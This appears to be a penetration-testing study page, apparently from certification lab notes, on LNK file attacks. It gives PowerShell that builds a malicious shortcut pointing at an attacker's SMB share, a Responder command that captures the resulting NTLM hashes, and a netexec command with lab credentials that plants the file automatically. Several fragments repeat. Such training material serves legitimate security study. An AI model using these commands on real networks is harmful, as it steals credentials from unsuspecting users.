LNK File Attacks

A LNK File Attack is a type of watering hole attack that is done by creating a malicious file that points back to us, placing it inside of shared folder and then waiting for hashes to fly into Responder.

Manual Attack Setup

Inside of an elevated PowerShell shell create the malicious file

$objShell = New-Object -ComObject WScript.shell
$lnk = $objShell.CreateShortcut("C:\evil.lnk")
$lnk.TargetPath = "\\<YOUR-IP>\@evil.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "evil"
$lnk.HotKey = "Ctrl+Alt+T"
$lnk.Save()

Run Responder

sudo responder -I eth0 -dwv

Automated Attack via Netexec

netexec smb 192.168.138.132 -d pnpt.local -u greg -p Password1 -M slinky -o NAME=evil SERVER=192.168.138.149

PreviousToken Impersonation NextGPP / cPassword Attacks

LNK File Attacks

Manual Attack Setup

Inside of an elevated PowerShell shell create the malicious file

$objShell = New-Object -ComObject WScript.shell
$lnk = $objShell.CreateShortcut("C:\evil.lnk")
$lnk.TargetPath = "\\<YOUR-IP>\@evil.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "evil"
$lnk.HotKey = "Ctrl+Alt+T"
$lnk.Save()

Run Responder

sudo responder -I eth0 -dwv

Automated Attack via Netexec

netexec smb 192.168.138.132 -d pnpt.local -u greg -p Password1 -M slinky -o NAME=evil SERVER=192.168.138.149

PreviousToken Impersonation NextGPP / cPassword Attacks

Manual Attack Setup

Inside of an elevated PowerShell shell create the malicious file

Save the file with an @ symbol at beginning of the name so it loads at the top of the share

Run Responder

Automated Attack via Netexec

Manual Attack Setup

Inside of an elevated PowerShell shell create the malicious file

Save the file with an @ symbol at beginning of the name so it loads at the top of the share

Run Responder

Automated Attack via Netexec